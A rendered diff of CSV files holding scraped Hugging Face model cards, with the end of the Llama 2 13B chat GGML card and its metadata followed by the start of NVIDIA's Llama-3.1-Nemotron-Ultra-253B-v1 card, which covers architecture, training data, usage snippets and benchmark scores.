|Llama 1|13B|41.74|23.08|
|
| 265 |
+
|Llama 1|33B|44.19|22.57|
|
| 266 |
+
|Llama 1|65B|48.71|21.77|
|
| 267 |
+
|Llama 2|7B|33.29|**21.25**|
|
| 268 |
+
|Llama 2|13B|41.86|26.10|
|
| 269 |
+
|Llama 2|70B|**50.18**|24.60|
|
| 270 |
+
|
| 271 |
+
**Evaluation of pretrained LLMs on automatic safety benchmarks.** For TruthfulQA, we present the percentage of generations that are both truthful and informative (the higher the better). For ToxiGen, we present the percentage of toxic generations (the smaller the better).
|
| 272 |
+
|
| 273 |
+
|
| 274 |
+
|||TruthfulQA|Toxigen|
|
| 275 |
+
|---|---|---|---|
|
| 276 |
+
|Llama-2-Chat|7B|57.04|**0.00**|
|
| 277 |
+
|Llama-2-Chat|13B|62.18|**0.00**|
|
| 278 |
+
|Llama-2-Chat|70B|**64.14**|0.01|
|
| 279 |
+
|
| 280 |
+
**Evaluation of fine-tuned LLMs on different safety datasets.** Same metric definitions as above.
|
| 281 |
+
|
| 282 |
+
## Ethical Considerations and Limitations
|
| 283 |
+
Llama 2 is a new technology that carries risks with use. Testing conducted to date has been in English, and has not covered, nor could it cover all scenarios. For these reasons, as with all LLMs, Llama 2’s potential outputs cannot be predicted in advance, and the model may in some instances produce inaccurate, biased or other objectionable responses to user prompts. Therefore, before deploying any applications of Llama 2, developers should perform safety testing and tuning tailored to their specific applications of the model.
|
| 284 |
+
|
| 285 |
+
Please see the Responsible Use Guide available at [https://ai.meta.com/llama/responsible-use-guide/](https://ai.meta.com/llama/responsible-use-guide)
|
| 286 |
+
|
| 287 |
+
## Reporting Issues
|
| 288 |
+
Please report any software “bug,” or other problems with the models through one of the following means:
|
| 289 |
+
- Reporting issues with the model: [github.com/facebookresearch/llama](http://github.com/facebookresearch/llama)
|
| 290 |
+
- Reporting problematic content generated by the model: [developers.facebook.com/llama_output_feedback](http://developers.facebook.com/llama_output_feedback)
|
| 291 |
+
- Reporting bugs and security concerns: [facebook.com/whitehat/info](http://facebook.com/whitehat/info)
|
| 292 |
+
|
| 293 |
+
## Llama Model Index
|
| 294 |
+
|Model|Llama2|Llama2-hf|Llama2-chat|Llama2-chat-hf|
|
| 295 |
+
|---|---|---|---|---|
|
| 296 |
+
|7B| [Link](https://huggingface.co/llamaste/Llama-2-7b) | [Link](https://huggingface.co/llamaste/Llama-2-7b-hf) | [Link](https://huggingface.co/llamaste/Llama-2-7b-chat) | [Link](https://huggingface.co/llamaste/Llama-2-7b-chat-hf)|
|
| 297 |
+
|13B| [Link](https://huggingface.co/llamaste/Llama-2-13b) | [Link](https://huggingface.co/llamaste/Llama-2-13b-hf) | [Link](https://huggingface.co/llamaste/Llama-2-13b-chat) | [Link](https://huggingface.co/llamaste/Llama-2-13b-hf)|
|
| 298 |
+
|70B| [Link](https://huggingface.co/llamaste/Llama-2-70b) | [Link](https://huggingface.co/llamaste/Llama-2-70b-hf) | [Link](https://huggingface.co/llamaste/Llama-2-70b-chat) | [Link](https://huggingface.co/llamaste/Llama-2-70b-hf)|
|
| 299 |
+
","{""id"": ""TheBloke/Llama-2-13B-chat-GGML"", ""author"": ""TheBloke"", ""sha"": ""3140827b4dfcb6b562cd87ee3d7f07109b014dd0"", ""last_modified"": ""2023-09-27 13:00:18+00:00"", ""created_at"": ""2023-07-18 18:03:26+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 315, ""downloads_all_time"": null, ""likes"": 697, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""llama"", ""facebook"", ""meta"", ""pytorch"", ""llama-2"", ""text-generation"", ""en"", ""arxiv:2307.09288"", ""base_model:meta-llama/Llama-2-13b-chat-hf"", ""base_model:finetune:meta-llama/Llama-2-13b-chat-hf"", ""license:other"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: meta-llama/Llama-2-13b-chat-hf\nlanguage:\n- en\nlicense: other\nmodel_name: Llama 2 13B Chat\npipeline_tag: text-generation\ntags:\n- facebook\n- meta\n- pytorch\n- llama\n- llama-2\ninference: false\nmodel_creator: Meta Llama 2\nmodel_link: https://huggingface.co/meta-llama/Llama-2-13b-chat-hf\nmodel_type: llama\nquantized_by: TheBloke"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""model_type"": ""llama""}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='LICENSE', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Notice', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='USE_POLICY.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q2_K.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q3_K_L.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q3_K_M.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q3_K_S.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q4_0.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q4_1.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q4_K_M.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q4_K_S.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q5_0.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q5_1.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q5_K_M.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q5_K_S.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q6_K.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='llama-2-13b-chat.ggmlv3.q8_0.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [""mikeee/llama2-7b-chat-uncensored-ggml"", ""memef4rmer/llama2-7b-chat-uncensored-ggml"", ""Nymbo/llama2-7b-chat-uncensored-ggml"", ""mikeee/nousresearch-nous-hermes-llama2-13b-ggml"", ""gsaivinay/Llama-2-13B-GGML-server"", ""mikeee/llama2-7b-chat-ggml"", ""rodevel1978/llama-2-13b-chat.ggmlv3.q4_K_S"", ""PSMdata/langchain-llama2-7b-chat"", ""ankanpy/LlamaGPT"", ""DHEIVER/VestibulaIA"", ""mikeee/langchain-llama2-7b-chat-uncensored-ggml"", ""K00B404/langchain-llama2-7b-chat-uncensored-ggml"", ""imenayadi/Smart-inbox"", ""jorgefio/Case-Classification-Llama-2"", ""lavanjv/vec-digichat"", ""TogetherAI/llahrou"", ""ndn1954/pdfchatbot"", ""AinzOoalGowns/llama2-7b-chat-uncensored-test"", ""Jafta/llama2-7b-chat-ggml"", ""Awe03/ai"", ""jingwora/llama2-7b-chat-ggml"", ""yuping322/LLaMA-2-CHAT"", ""dnzengou/llama-gpt-chatbot"", ""cpereira/ask-a-bot"", ""JohnTan38/llama-2-7b-chat-1"", ""Y0R6/Comet_chatbot2.0"", ""gauravprasadgp/genai"", ""GaboDataScientist/Open_LLM"", ""Dalleon/llama2-7b-chat-uncensored-ggml"", ""brunodoti/turing-20.0"", ""Jayem-11/LLama2_gguf"", ""Skizzy-create/Ona-quantized-LLAMA"", ""kellyshreeve/QA-chatbot"", ""sanket09/llama-2-7b-chat"", ""Antonio49/llama-2-7b-chat"", ""salomonsky/llama"", ""patelankita/TextSummary"", ""LucasMendes/llama2-7b-chat-uncensored-ggml"", ""pvucontroller/llama2-7b-chat-uncensored-ggml"", ""lockp111/llama2-7b-chat-uncensored-ggml"", ""Ashrafb/llama-2-7b-chatttt"", ""ubermenchh/arxiv-retrieval"", ""dkazuma/testajah"", ""SlyFox29/Colonial_llama2"", ""geoffhorowitz/gradio_sandbox"", ""Leco1701/LENRapi"", ""patelankita/PythonCodeGenerator"", ""sachin1826/blog_generator"", ""SansarK/SansarChat"", ""ThiseniSenethma/llama-emotion-app""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-09-27 13:00:18+00:00"", ""cardData"": ""base_model: meta-llama/Llama-2-13b-chat-hf\nlanguage:\n- en\nlicense: other\nmodel_name: Llama 2 13B Chat\npipeline_tag: text-generation\ntags:\n- facebook\n- meta\n- pytorch\n- llama\n- llama-2\ninference: false\nmodel_creator: Meta Llama 2\nmodel_link: https://huggingface.co/meta-llama/Llama-2-13b-chat-hf\nmodel_type: llama\nquantized_by: TheBloke"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""64b6d3eeab056b63ede8a758"", ""modelId"": ""TheBloke/Llama-2-13B-chat-GGML"", ""usedStorage"": 116526450432}",0,,0,,0,,0,,0,"Ashrafb/llama-2-7b-chatttt, DHEIVER/VestibulaIA, Nymbo/llama2-7b-chat-uncensored-ggml, PSMdata/langchain-llama2-7b-chat, ankanpy/LlamaGPT, gsaivinay/Llama-2-13B-GGML-server, huggingface/InferenceSupport/discussions/new?title=TheBloke/Llama-2-13B-chat-GGML&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BTheBloke%2FLlama-2-13B-chat-GGML%5D(%2FTheBloke%2FLlama-2-13B-chat-GGML)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, memef4rmer/llama2-7b-chat-uncensored-ggml, mikeee/langchain-llama2-7b-chat-uncensored-ggml, mikeee/llama2-7b-chat-ggml, mikeee/llama2-7b-chat-uncensored-ggml, mikeee/nousresearch-nous-hermes-llama2-13b-ggml, rodevel1978/llama-2-13b-chat.ggmlv3.q4_K_S",13
|
Llama-3_1-Nemotron-Ultra-253B-v1_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
@@ -0,0 +1,369 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
nvidia/Llama-3_1-Nemotron-Ultra-253B-v1,"---
|
| 3 |
+
library_name: transformers
|
| 4 |
+
license: other
|
| 5 |
+
license_name: nvidia-open-model-license
|
| 6 |
+
license_link: >-
|
| 7 |
+
https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/
|
| 8 |
+
|
| 9 |
+
pipeline_tag: text-generation
|
| 10 |
+
language:
|
| 11 |
+
- en
|
| 12 |
+
tags:
|
| 13 |
+
- nvidia
|
| 14 |
+
- llama-3
|
| 15 |
+
- pytorch
|
| 16 |
+
---
|
| 17 |
+
|
| 18 |
+
# Llama-3.1-Nemotron-Ultra-253B-v1
|
| 19 |
+
|
| 20 |
+
## Model Overview
|
| 21 |
+
|
| 22 |
+

|
| 23 |
+
|
| 24 |
+
Llama-3.1-Nemotron-Ultra-253B-v1 is a large language model (LLM) which is a derivative of [Meta Llama-3.1-405B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-405B-Instruct) (AKA the *reference model*). It is a reasoning model that is post trained for reasoning, human chat preferences, and tasks, such as RAG and tool calling. The model supports a context length of 128K tokens. This model fits on a single 8xH100 node for inference.
|
| 25 |
+
|
| 26 |
+
Llama-3.1-Nemotron-Ultra-253B-v1 is a model which offers a great tradeoff between model accuracy and efficiency. Efficiency (throughput) directly translates to savings. Using a novel Neural Architecture Search (NAS) approach, we greatly reduce the model’s memory footprint, enabling larger workloads, as well as reducing the number of GPUs required to run the model in a data center environment. This NAS approach enables the selection of a desired point in the accuracy-efficiency tradeoff. Furthermore, by using a novel method to vertically compress the model (see details [here](https://arxiv.org/abs/2503.18908)), it also offers a significant improvement in latency.
|
| 27 |
+
|
| 28 |
+
The model underwent a multi-phase post-training process to enhance both its reasoning and non-reasoning capabilities. This includes a supervised fine-tuning stage for Math, Code, Reasoning, Chat, and Tool Calling as well as multiple reinforcement learning (RL) stages using Group Relative Policy Optimization (GRPO) algorithms for reasoning, chat, and instruction-following.
|
| 29 |
+
|
| 30 |
+
This model is ready for commercial use.
|
| 31 |
+
|
| 32 |
+
For more details on how the model was trained, please see [this blog](https://developer.nvidia.com/blog/build-enterprise-ai-agents-with-advanced-open-nvidia-llama-nemotron-reasoning-models/).
|
| 33 |
+
|
| 34 |
+

|
| 35 |
+
|
| 36 |
+
This model is part of the Llama Nemotron Collection. You can find the other model(s) in this family here:
|
| 37 |
+
|
| 38 |
+
- [Llama-3.1-Nemotron-Nano-8B-v1](https://huggingface.co/nvidia/Llama-3.1-Nemotron-Nano-8B-v1)
|
| 39 |
+
- [Llama-3.3-Nemotron-Super-49B-v1](https://huggingface.co/nvidia/Llama-3\_3-Nemotron-Super-49B-v1)
|
| 40 |
+
|
| 41 |
+
## License/Terms of Use
|
| 42 |
+
|
| 43 |
+
GOVERNING TERMS: Your use of this model is governed by the [NVIDIA Open Model License.](https://www.nvidia.com/en-us/agreements/enterprise-software/nvidia-open-model-license/) Additional Information: [Llama 3.1 Community License Agreement](https://www.llama.com/llama3\_1/license/). Built with Llama.
|
| 44 |
+
|
| 45 |
+
**Model Developer:** NVIDIA
|
| 46 |
+
|
| 47 |
+
**Model Dates:** Trained between November 2024 and April 2025
|
| 48 |
+
|
| 49 |
+
**Data Freshness:** The pretraining data has a cutoff of 2023 per Llama-3.1-405B-Instruct
|
| 50 |
+
|
| 51 |
+
### Use Case:
|
| 52 |
+
Developers designing AI Agent systems, chatbots, RAG systems, and other AI-powered applications. Also suitable for typical instruction-following tasks.
|
| 53 |
+
|
| 54 |
+
### Release Date:
|
| 55 |
+
2025-04-07
|
| 56 |
+
|
| 57 |
+
## References
|
| 58 |
+
|
| 59 |
+
* [\[2502.00203\] Reward-aware Preference Optimization: A Unified Mathematical Framework for Model Alignment](https://arxiv.org/abs/2502.00203)
|
| 60 |
+
* [\[2411.19146\]Puzzle: Distillation-Based NAS for Inference-Optimized LLMs](https://arxiv.org/abs/2411.19146)
|
| 61 |
+
* [\[2503.18908\]FFN Fusion: Rethinking Sequential Computation in Large Language Models](https://arxiv.org/abs/2503.18908)
|
| 62 |
+
|
| 63 |
+
## Model Architecture
|
| 64 |
+
**Architecture Type:** Dense decoder-only Transformer model
|
| 65 |
+
**Network Architecture:** Llama-3.1-405B-Instruct, customized through Neural Architecture Search (NAS)
|
| 66 |
+
|
| 67 |
+
**This model was developed based on Llama-3.1-405B-Instruct <br>
|
| 68 |
+
** This model has 253B model parameters. <br>
|
| 69 |
+
|
| 70 |
+
The model is a derivative of Llama 3.1-405B-Instruct, using Neural Architecture Search (NAS). The NAS algorithm results in non-standard and non-repetitive blocks. This includes the following:
|
| 71 |
+
|
| 72 |
+
* Skip attention: In some blocks, the attention is skipped entirely, or replaced with a single linear layer.
|
| 73 |
+
* Variable FFN: The expansion/compression ratio in the FFN layer is different between blocks.
|
| 74 |
+
* FFN Fusion: When several consecutive attention layers are skipped, which can result in a sequence of multiple FFNs, that sequence of FFNs are fused into a smaller number of wider FFN layers.
|
| 75 |
+
|
| 76 |
+
For each block of the reference model, we create multiple variants providing different tradeoffs of quality vs. computational complexity, discussed in more depth below. We then search over the blocks to create a model which meets the required throughput and memory while minimizing the quality degradation. To recover performance, the model initially undergoes knowledge distillation (KD) for 65 billion tokens. This is followed by a continual pretraining (CPT) phase for 88 billion tokens.
|
| 77 |
+
|
| 78 |
+
## Intended use
|
| 79 |
+
|
| 80 |
+
Llama-3.1-Nemotron-Ultra-253B-v1 is a general purpose reasoning and chat model intended to be used in English and coding languages. Other non-English languages (German, French, Italian, Portuguese, Hindi, Spanish, and Thai) are also supported.
|
| 81 |
+
|
| 82 |
+
## Input
|
| 83 |
+
- **Input Type:** Text
|
| 84 |
+
- **Input Format:** String
|
| 85 |
+
- **Input Parameters:** One-Dimensional (1D)
|
| 86 |
+
- **Other Properties Related to Input:** Context length up to 131,072 tokens
|
| 87 |
+
|
| 88 |
+
## Output
|
| 89 |
+
- **Output Type:** Text
|
| 90 |
+
- **Output Format:** String
|
| 91 |
+
- **Output Parameters:** One-Dimensional (1D)
|
| 92 |
+
- **Other Properties Related to Output:** Context length up to 131,072 tokens
|
| 93 |
+
|
| 94 |
+
## Software Integration
|
| 95 |
+
- **Runtime Engine:** Transformers
|
| 96 |
+
- **Recommended Hardware Microarchitecture Compatibility:**
|
| 97 |
+
- NVIDIA Hopper
|
| 98 |
+
- NVIDIA Ampere
|
| 99 |
+
- **Preferred Operating System(s):** Linux
|
| 100 |
+
|
| 101 |
+
## Model Version
|
| 102 |
+
1.0 (4/7/2025)
|
| 103 |
+
|
| 104 |
+
## Quick Start and Usage Recommendations:
|
| 105 |
+
|
| 106 |
+
1. Reasoning mode (ON/OFF) is controlled via the system prompt, which must be set as shown in the example below. All instructions should be contained within the user prompt
|
| 107 |
+
2. We recommend setting temperature to \`0.6\`, and Top P to \`0.95\` for Reasoning ON mode
|
| 108 |
+
3. We recommend using greedy decoding (temperature 0\) for Reasoning OFF mode
|
| 109 |
+
4. We do not recommend to add additional system prompts besides the control prompt, all instructions should be put into user query
|
| 110 |
+
5. We have provided a list of prompts to use for evaluation for each benchmark where a specific template is required
|
| 111 |
+
|
| 112 |
+
You can try this model out through the preview API, using this link: [Llama-3\_1-Nemotron-Ultra-253B-v1](https://build.nvidia.com/nvidia/llama-3\_1-nemotron-ultra-253b-v1).
|
| 113 |
+
|
| 114 |
+
### Use It with Transformers
|
| 115 |
+
See the snippet below for usage with [Hugging Face Transformers](https://huggingface.co/docs/transformers/main/en/index) library. Reasoning mode (ON/OFF) is controlled via system prompt. Please see the example below
|
| 116 |
+
|
| 117 |
+
We recommend using the *transformers* package with version 4.48.3.
|
| 118 |
+
Example of reasoning on:
|
| 119 |
+
|
| 120 |
+
```py
|
| 121 |
+
import torch
|
| 122 |
+
import transformers
|
| 123 |
+
|
| 124 |
+
model_id = ""nvidia/Llama-3_1-Nemotron-Ultra-253B-v1""
|
| 125 |
+
model_kwargs = {""torch_dtype"": torch.bfloat16, ""trust_remote_code"": True, ""device_map"": ""auto""}
|
| 126 |
+
tokenizer = transformers.AutoTokenizer.from_pretrained(model_id)
|
| 127 |
+
tokenizer.pad_token_id = tokenizer.eos_token_id
|
| 128 |
+
|
| 129 |
+
pipeline = transformers.pipeline(
|
| 130 |
+
""text-generation"",
|
| 131 |
+
model=model_id,
|
| 132 |
+
tokenizer=tokenizer,
|
| 133 |
+
max_new_tokens=32768,
|
| 134 |
+
temperature=0.6,
|
| 135 |
+
top_p=0.95,
|
| 136 |
+
**model_kwargs
|
| 137 |
+
)
|
| 138 |
+
|
| 139 |
+
thinking = ""on""
|
| 140 |
+
|
| 141 |
+
|
| 142 |
+
print(pipeline([{""role"": ""system"", ""content"": f""detailed thinking {thinking}""},{""role"": ""user"", ""content"": ""Solve x*(sin(x)+2)=0""}]))
|
| 143 |
+
```
|
| 144 |
+
|
| 145 |
+
Example of reasoning off:
|
| 146 |
+
|
| 147 |
+
```py
|
| 148 |
+
import torch
|
| 149 |
+
import transformers
|
| 150 |
+
|
| 151 |
+
model_id = ""nvidia/Llama-3_1-Nemotron-ULtra-253B-v1""
|
| 152 |
+
model_kwargs = {""torch_dtype"": torch.bfloat16, ""trust_remote_code"": True, ""device_map"": ""auto""}
|
| 153 |
+
tokenizer = transformers.AutoTokenizer.from_pretrained(model_id)
|
| 154 |
+
tokenizer.pad_token_id = tokenizer.eos_token_id
|
| 155 |
+
|
| 156 |
+
pipeline = transformers.pipeline(
|
| 157 |
+
""text-generation"",
|
| 158 |
+
model=model_id,
|
| 159 |
+
tokenizer=tokenizer,
|
| 160 |
+
max_new_tokens=32768,
|
| 161 |
+
do_sample=False,
|
| 162 |
+
**model_kwargs
|
| 163 |
+
)
|
| 164 |
+
|
| 165 |
+
thinking = ""off""
|
| 166 |
+
|
| 167 |
+
|
| 168 |
+
print(pipeline([{""role"": ""system"", ""content"": f""detailed thinking {thinking}""},{""role"": ""user"", ""content"": ""Solve x*(sin(x)+2)=0""}]))
|
| 169 |
+
```
|
| 170 |
+
|
| 171 |
+
### Use It with vLLM
|
| 172 |
+
|
| 173 |
+
```
|
| 174 |
+
pip install vllm==0.8.3
|
| 175 |
+
```
|
| 176 |
+
An example on how to serve with vLLM:
|
| 177 |
+
```
|
| 178 |
+
python3 -m vllm.entrypoints.openai.api_server \
|
| 179 |
+
--model ""nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"" \
|
| 180 |
+
--trust-remote-code \
|
| 181 |
+
--seed=1 \
|
| 182 |
+
--host=""0.0.0.0"" \
|
| 183 |
+
--port=5000 \
|
| 184 |
+
--served-model-name ""nvidia/Llama-3_1-Nemotron-Ultra-253B-v1"" \
|
| 185 |
+
--tensor-parallel-size=8 \
|
| 186 |
+
--max-model-len=32768 \
|
| 187 |
+
--gpu-memory-utilization 0.95 \
|
| 188 |
+
--enforce-eager
|
| 189 |
+
```
|
| 190 |
+
## Inference:
|
| 191 |
+
**Engine:**
|
| 192 |
+
|
| 193 |
+
- Transformers
|
| 194 |
+
|
| 195 |
+
**Test Hardware:**
|
| 196 |
+
- BF16:
|
| 197 |
+
- 8x NVIDIA H100-80GB
|
| 198 |
+
- 4x NVIDIA B100
|
| 199 |
+
- FP 8
|
| 200 |
+
- 4x NVIDIA H100-80GB
|
| 201 |
+
|
| 202 |
+
## Training and Evaluation Datasets
|
| 203 |
+
|
| 204 |
+
## Training Datasets
|
| 205 |
+
|
| 206 |
+
A large variety of training data was used for the knowledge distillation phase before post-training pipeline, 3 of which included: FineWeb, Buzz-V1.2, and Dolma.
|
| 207 |
+
|
| 208 |
+
The data for the multi-stage post-training phases is a compilation of SFT and RL data that supports improvements of math, code, general reasoning, and instruction following capabilities of the original Llama instruct model.
|
| 209 |
+
|
| 210 |
+
Prompts have been sourced from either public and open corpus or synthetically generated. Responses were synthetically generated by a variety of models, with some prompts containing responses for both reasoning on and off modes, to train the model to distinguish between two modes. This model was improved with Qwen.
|
| 211 |
+
|
| 212 |
+
We have released our [Llama-Nemotron-Post-Training-Dataset](https://huggingface.co/datasets/nvidia/Llama-Nemotron-Post-Training-Dataset) to promote openness and transparency in model development and improvement.
|
| 213 |
+
|
| 214 |
+
**Data Collection for Training Datasets:**
|
| 215 |
+
|
| 216 |
+
- Hybrid: Automated, Human, Synthetic
|
| 217 |
+
|
| 218 |
+
**Data Labeling for Training Datasets:**
|
| 219 |
+
|
| 220 |
+
- Hybrid: Automated, Human, Synthetic
|
| 221 |
+
|
| 222 |
+
## Evaluation Datasets
|
| 223 |
+
|
| 224 |
+
We used the datasets listed in the next section to evaluate Llama-3.1-Nemotron-Ultra-253B-v1.
|
| 225 |
+
|
| 226 |
+
Data Collection for Evaluation Datasets:
|
| 227 |
+
|
| 228 |
+
- Hybrid: Human/Synthetic
|
| 229 |
+
|
| 230 |
+
Data Labeling for Evaluation Datasets:
|
| 231 |
+
|
| 232 |
+
- Hybrid: Human/Synthetic/Automatic
|
| 233 |
+
|
| 234 |
+
## Evaluation Results
|
| 235 |
+
*These results contain both Reasoning On, and Reasoning Off. We recommend using temperature=\`0.6\`, top\_p=\`0.95\` for Reasoning On mode, and greedy decoding for Reasoning Off mode. All evaluations are done with 32k sequence length. We run the benchmarks up to 16 times and average the scores to be more accurate.*
|
| 236 |
+
|
| 237 |
+
|
| 238 |
+
> NOTE: Where applicable, a Prompt Template will be provided. While completing benchmarks, please ensure that you are parsing for the correct output format as per the provided prompt in order to reproduce the benchmarks seen below.
|
| 239 |
+
|
| 240 |
+
### GPQA
|
| 241 |
+
|
| 242 |
+
| Reasoning Mode | pass@1 |
|
| 243 |
+
|--------------|------------|
|
| 244 |
+
| Reasoning Off | 56.60 |
|
| 245 |
+
| Reasoning On | 76.01 |
|
| 246 |
+
|
| 247 |
+
User Prompt Template:
|
| 248 |
+
|
| 249 |
+
```
|
| 250 |
+
""What is the correct answer to this question: {question}\nChoices:\nA. {option_A}\nB. {option_B}\nC. {option_C}\nD. {option_D}\nLet's think step by step, and put the final answer (should be a single letter A, B, C, or D) into a \boxed{}""
|
| 251 |
+
```
|
| 252 |
+
|
| 253 |
+
### AIME25
|
| 254 |
+
|
| 255 |
+
| Reasoning Mode | pass@1 |
|
| 256 |
+
|--------------|------------|
|
| 257 |
+
| Reasoning Off | 16.67 |
|
